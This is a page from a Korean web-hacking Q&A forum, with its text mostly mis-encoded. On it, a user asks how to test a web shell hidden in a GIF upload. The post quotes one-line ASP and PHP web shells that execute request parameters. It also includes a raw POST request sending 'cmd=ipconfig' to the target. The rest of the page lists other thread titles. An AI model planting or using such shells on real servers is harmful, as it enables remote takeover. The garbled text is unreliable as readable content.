214, 2/11 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   stoopynice
   À¥½© °ü·Ã Áú¹®ÀÖ½À´Ï´Ù.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_Web&no=209 [º¹»ç]


±× ÆÄÀÏ ¾÷·Îµå ¿ìȸÇؼ­ (gif ÆÄÀÏ¿¡ ¾Æ·¡ Äڵ带 ³Ö¾î¼­)
<%execute(request("cmd"))%>
<?php eval($_POST[cmd]);?>
ÆäÀÌÁö¿¡ »ðÀÔÇÑ´ÙÀ½¿¡ ipconfig°°Àº ¸í·ÉÀ» ½ÇÇèÇغ¸°í ½ÍÀºµ¥
(À§¿¡ Äڵ尡 cmd ºÒ·¯¿Í¼­ cmd ¸í·ÉÇϴ°ÅÁÒ?)
Çǵ鷯¿¡ composer ÅÇ¿¡ ¾Æ·¡ ³»¿ë º¸³»¸é µÇ³ª¿ä??
POST http://\\\\/index.php?***.gif
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: ***/index.php
WS=110&CCODE=000101
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
DNT: 1
Host: ***
Cookie: PHPSESSID=h6ddjfsn45r1sqc9tvg2p6pje0
Content-Length: 9
cmd=ipconfig;

¿ä·±½ÄÀ¸·Î executeÇؼ­ Å×½ºÆ®ÇϸéµÇ³ª¿ä?

  Hit : 4674     Date : 2015/07/26 12:22



    
194   À¥ÇØÅ· ÇÒ¶§ ÇÊ¿äÇÑ À¥(ÇÁ·Î±×·¡¹Ö)¾ð¾î[2]     ralehgus123
05/12 5434
193   À̹ø¿¡ Çб³¿¡¼­ OWASP½ºÅ͵𸦠½ÃÀÛÇߴµ¥¿ä ¿©Â庼°Ô Á»¸¹¾Æ¼­...¤»[1]     heizelnet
07/17 5231
192   [À¥Áú¹®] »çÀÌÆ® ¼Ò½º¸¦ Åë°·Î °®°í¿À´Â ÅøÀÌ ÀÖ³ª¿ä?[2]     helpwizet
03/08 5225
191   ¸ÞÀÏ ÇØÅ·¿¡ ´ëÇؼ­ ¹®ÀÇ ÇÕ´Ï´Ù[5]     wqw3
12/16 5049
190   À¥ÇØÅ· °ü·Ã Áú¹® Á» µå¸³´Ï´Ù.[2]     bigshott
12/16 5049
189   À¥°ø°Ý Top3[3]     Pang
02/07 5048
188   ÆÄÀÏ ¾÷·Îµå Ãë¾àÁ¡ Áú¹® ÀÔ´Ï´Ù.[2]     bigshott
12/25 5009
187   Paros Åø °ü·Ã Áú¹®[2]     stalaction
10/21 4939
186   webhacking.kr[1]     °¡¸é¼ÓÀǹ̼Ò
04/28 4925
185   À¥ÇØÅ· ¹æ¹ý? Áú¹®ÇÕ´Ï´Ù.[1]     wilmamom
01/23 4896
184   ¸ÅÁ÷ÄõÅÍ ¿ìȸ ¹æ¹ý¿¡ ´ëÇØ Áú¹®µå¸³´Ï´Ù.[1]     tpdbs953
10/17 4863
183   sessionid´Â ¾î¶²Á¾·ùÀÇ ¾ÏÈ£·Î ÀÎÄÚµù µÇ´Â°Ç°¡¿ä?[2]     kangms0801
04/03 4816
182   vbscript·Î Ŭ¶óÀ̾ðÆ® ½Å·ÚÇÒ ¼ö ÀÖ´Â »çÀÌÆ® µî·Ï ÇÏ´Â ¹æ¹ýÀÌ ±Ã±ÝÇÕ´Ï´Ù     lekel09
10/10 4745
181   SQL Injection °ø°Ý±â¹ý Áú¹®µå¸³´Ï´Ù.[3]     kmc8724
07/03 4730
180   XSS ÇØÅ· Áú¹®[3]     test11
03/07 4727
179   ·Î±×ÀÎ ÆäÀÌÁö ±¸ÇöÁß header ÇÔ¼öÀÇ ÀǹÌ[2]     ka0r1
04/10 4720
178   À¥ÇØÅ· °øºÎ¼ø¼­¸¦ ¾Ë·ÁÁÖ¼¼¿ä..[2]     nooooooob
02/28 4696
  À¥½© °ü·Ã Áú¹®ÀÖ½À´Ï´Ù.     stoopynice
07/26 4673
176   header¿Í body°¡ ±¸ºÐµÇ¾î ÀÖ´Â ÀÌÀ¯?[4]     ka0r1
04/12 4657
175   À̹ÌÁö¾È¿¡ ¸®´ÙÀÌ·ºÆ® ¼Ò½º(¾Ç¿ë¸ñÀûX)[2]     tjdgus1515
12/06 4622
[1] 2 [3][4][5][6][7][8][9][10]..[11]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org